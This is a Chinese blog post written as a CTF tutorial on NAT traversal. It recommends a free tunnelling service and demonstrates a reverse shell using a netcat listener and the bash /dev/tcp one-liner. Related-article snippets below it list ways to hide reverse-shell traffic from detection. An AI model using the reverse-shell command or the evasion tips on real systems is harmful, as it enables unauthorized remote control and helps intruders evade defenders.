利用内网穿透进行反弹shell 免费隧道

最新推荐文章于 2024-05-27 18:37:35 发布
最新推荐文章于 2024-05-27 18:37:35 发布
阅读量1.2k 收藏 4
点赞数 1
分类专栏: ctf技术 文章标签: 网络 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zheng_Jay/article/details/121236608
版权

利用内网穿透进行反弹shell 白嫖隧道

什么是内网穿透

网上的解释

某个内网穿透的服务提供商的解释是:内网穿透是我们在进行网络连接时的一种术语,也叫做NAT穿透,即在计算机是局域网内的时候,外网与内网的计算机的节点进行连接时所需要的连接通信,有时候就会出现内网穿透不支的情况。内网穿透的功能就是,当我们在端口映射时设置时,内网穿透起到了地址转换的功能,也就是把公网的地址进行翻译,转成为一种私有的地址,然后再采用路由的方式ADSL的宽带路由器,具有一个动态或者是固定的公网IP,最后ADSL直接在交换机上,这样所有的电脑都可以共享上网。内网穿透除了可以实现内网之间机器的网络通信功通之外,还可以解决UDP中出现的数据传输不稳定问题。

个人理解

这东西跟计网学的NAT网络地址转换好像是一回事,就是内网的某台主机的套接字跟公网的某个套接字进行绑定,在外网看来,内网主机的ip就是绑定的这个公网套接字了,我们可以通过这个套接字往外界发数据包,外界也可以将数据包发送该套接字,再转发到本地,从而实现内网和外网之间的通信。
在这里插入图片描述
那么,既然跟NAT地址转发一样,为什么不能直接用网关分配给我们的公网套接字进行反弹shell呢?
理论上讲,如果知道了这个公网套接字,我们的想法就可以实现,但我们没法知道网关的地址映射表,emmm…

内网穿透的作用

目前能想到的作用有两个:

  1. 可以搭建个人博客网站,这比直接去买云服务器便宜多了,笔者的室友就是用内网穿透将自己的blog上传到公网。
  2. 反弹shell。做这类题目需要本机作为服务器让靶机连接。

内网穿透免费吗?

很多提供内网穿透的软件都是付费的,免费的性能相对较差,这里笔者推荐一个:natapp。每个用户可以申请到两个免费隧道,性能还可以。
链接:https://natapp.cn/
官网有详细的图文教程。
在这里插入图片描述

反弹shell

环境

平台:VMware
系统:kali linux

测试

首先,开启内网穿透。
在这里插入图片描述
然后,打开一个shell,作为服务端,输入命令:nc -lvp 80
开启监听
在这里插入图片描述
接着,再打开一个客户端,也就是靶机,输入命令(记得修改ip和port):bash -i > /dev/tcp/ip/port 0>&1
连接服务端
在这里插入图片描述
连接成功后,服务端会有回显
在这里插入图片描述
现在,可以输入命令进行测试了。我们来个ls
在这里插入图片描述
测试成功!
由于笔者才疏学浅,以上内容可能有说得不对的地方,欢迎大家批评指正
^ ^

参考资料

内网穿透

1、https://service.oray.com/question/5571.html
2、https://baike.baidu.com/item/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/8597835?fr=aladdin

反弹shell

1、https://xz.aliyun.com/t/2549

Zheng_Jay
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 293
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
巴比达内网穿透免费内网穿透
07-13
3、远程访问公司内网财务系统、进销存系统、ERP系统等:巴比达可以帮助你访问公司内部网络的应用程序,如财务系统、进销存系统、ERP系统等。 4、搭建个人游戏:如果你想将你的游戏服务器,巴比达可以帮助你实现用于...
内网渗透-反弹Shell
道阻且长,行则将至。
07-07 3243
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
完全免费!动手简单的内网穿透工具(非常详细)零基础入门到精通, 收藏这一篇就够了
leah126的博客
05-15 1667
助力企业进入 “私有云” 时代。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内网渗透---反弹shell详解(内有各种姿势的详细过程)
weixin_45588247的博客
04-08 3470
声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于 违法犯罪,一经发现直接上报国家安全机关处理. 反弹shell 反弹shell: 在攻击者机器获得受害者机器的命令行。 文章目录反弹shell背景:正向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:反向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:其他方式反弹shell:msf反弹:实验环境:实验步骤:bash反弹:实验环境:实验步骤:python反弹:实验环境:实验步骤:php反弹:实验环境:实验步骤:p.
内网穿透&端口映射&内外网反弹 shell 回顾
Geek极安云科-致力于网络安全事业
05-27 821
NAT设备(或软件)维护一个状态表,用来把内部网络的私有 IP 地址映射到外部网络的合法 IP 地址上去每个包头中的 IP 地址和端口信息在 NAT 设备(或软件)中都被修改并翻译成一正确的 IP 地址发往下一级当一个内网主机通过 NAT 打开一个“外出”的 TCP 或 UDP 会话时,NAPT 分配给这个会话一个公网 IP 和端口,用来接收外网的响应的数据包,并经过转换通知内部网的主机这样,NAPT在[私有IP:私有端口]和[公网IP:公网端口]之间建立了一个端口绑定。
shell脚本自动启动内网刺透
ZechariahZheng
11-27 156
shell脚本自动启动内网刺透 本人自建blog网站(www.zechariahzheng.top) blog运行在内网环境下,需要进行内网的穿刺,但是内网穿刺工具经常运行几天之后便挂了。思路是:利用shell脚本,得知是否穿刺成功,如果没有的话重新启动进程。最后将脚本加入到Linux的crontab任务之中便可以了 内网穿刺工具 Sakura_frpc_linux_arm #!/bin/bash...
巴比达9.0.8版 免费内网穿透
最新发布
07-13
3、远程访问公司内网财务系统、进销存系统、ERP系统等:巴比达可以帮助你访问公司内部网络的应用程序,如财务系统、进销存系统、ERP系统等。 4、搭建个人游戏:如果你想将你的游戏服务器,巴比达可以帮助你实现用于...
免费内网穿透工具、巴比达
07-13
无需公网IP、无需设置路由器、即使你是网络小白也能轻松驾驭、三步完成。 用于:web站点、私有SVN源代码服务器、群晖NAS的共享文件夹、财务系统、进销存系统、ERP系统、远程桌面、微信公众平台、小程序接口等。
免费内网穿透、巴比达最新客户端
07-13
无需公网IP、无需设置路由器、即使你是网络小白也能轻松驾驭、三步完成。 用于:web站点、私有SVN源代码服务器、群晖NAS的共享文件夹、财务系统、进销存系统、ERP系统、远程桌面、微信公众平台、小程序接口等。
ngrok免费内网穿透,重点是免费
06-14
而“ngrok”就是一款优秀的内网穿透工具,尤其值得一提的是,它还提供了免费的服务。 ngrok的工作原理是通过在ngrok服务器上建立一个隧道,这个隧道的一端连接到你的内网服务,另一端则暴露在公网上。当你在外网...
ngrok免费内网穿透.zip
05-14
ngrok免费内网穿透 1.打开cmd到ngrok-stable-windows-amd64目录下 2.执行ngrok authtoken 7U4tPgujohKNgxtRtkuwg_6F7twiVnN5rJjHiX3H4KG 3.执行ngrok http 8080
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ngrok免费内网穿透工具及教程
04-04
本文将详细介绍“ngrok”这一免费内网穿透工具,并提供操作教程,帮助您轻松实现自己的本机服务器对外部网络开放。 **ngrok简介** Ngrok是一个强大的、易于使用的内网穿透工具,它允许您通过公共URL来访问本地...
免费内网穿透工具,内有使用说明
12-19
内网穿透工具的工作原理是创建一个隧道,将外网的请求转发到内网的特定设备上,反之亦然。 本资源提供了一个免费内网穿透工具,其简单易用的特点使得用户无需深入理解网络配置细节,也能实现内网服务的外部访问。...
钉钉内网穿透工具(附教程).zip
04-16
内网穿透工具是一种用于解决因网络环境限制导致的内网服务无法被外网访问的问题,这对于开发者进行远程调试、测试回调等操作极为重要。本文将详细介绍“钉钉内网穿透工具”及其使用教程。 首先,我们需要理解什么是...
隧道穿透:常规反弹、加密反弹
qq_68163788的博客
02-04 1014
隧道穿越是指数据在通过隧道时遇到障碍而需要绕过的过程。常规反弹是指数据在穿越隧道时遇到阻碍后直接返回原路,然后尝试其他路径。而加密反弹是指数据在穿越隧道时遇到阻碍后会进行加密处理,然后以不同的路径重新尝试穿越隧道。加密反弹相对于常规反弹更安全,因为加密可以保护数据不被窃取或篡改。
内网穿透原理解析
weixin_34113237的博客
05-16 809
在互联网信息时代的今天,经常会听到外网连接。而与外网所相对应的,是一种内部网络,很多的家庭或者公司利用内部网络进行多台电脑之间的资源共享,其中所用到的技术就是内网穿透技术,但却有很多的人对这种技术并不了解。下面小编为大家介绍一下内网穿透的工作原理是怎样的?什么是内网穿透?在了解原理之前我们先来了解一下什么是内网穿透。之前提到的内网,其是就是在公司或者是家庭内部,建立的一种局域网络或者是办公网络,...
使用SSH反向隧道进行内网穿透
猿起于此
08-12 206
假设有机器A 和B,A 有公网IP,B 位于NAT 之后并无可用的端口转发,现在想由A 主动向B 发起SSH 连接。由于B 在NAT 后端,无可用公网IP + 端口 这样一个组合,所以A 无法穿透NAT,这篇文章应对的就是这种情况。 首先有如下约定,因为很重要所以放在前面: 机器代号 机器位置 地址 账户 ssh/sshd 端口 是否需要运行sshd A 位于公网 a.site usera 22 是 B 位于NAT 之后 localhost userb 22 是 C 位于NAT 之后 localhost u
内网如和反弹shell反弹shell流量如和隐蔽
09-22
内网与反弹shell相关的流量是通过网络传输的。反弹shell流量可以通过加密和隐藏等手段进行隐蔽。对于内网和反弹shell,可以采用以下措施来增加其隐蔽性: 1. 使用加密传输:使用加密协议(如SSL/TLS)来保护反弹shell流量,以防止被监测和拦截。 2. 使用非标准端口:将反弹shell监听端口设置为非常见的端口号,以减少被侦测到的风险。 3. 伪装流量:将反弹shell流量与其他合法流量进行混淆,以减少被检测到的概率。例如,可以使用常见协议的特定字段或标头来伪装shell流量。 4. 使用代理服务器:通过使用代理服务器,可以隐藏真实的反弹shell服务器的位置和IP地址,增加隐蔽性。 5. 避免异常行为:在进行内网渗透时,应避免过多的异常行为,例如频繁的扫描和暴力破解等,以减少被监测到的风险。 6. 定期更新和维护:及时更新和维护反弹shell工具,以确保其能够应对最新的安全威胁和侦测技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值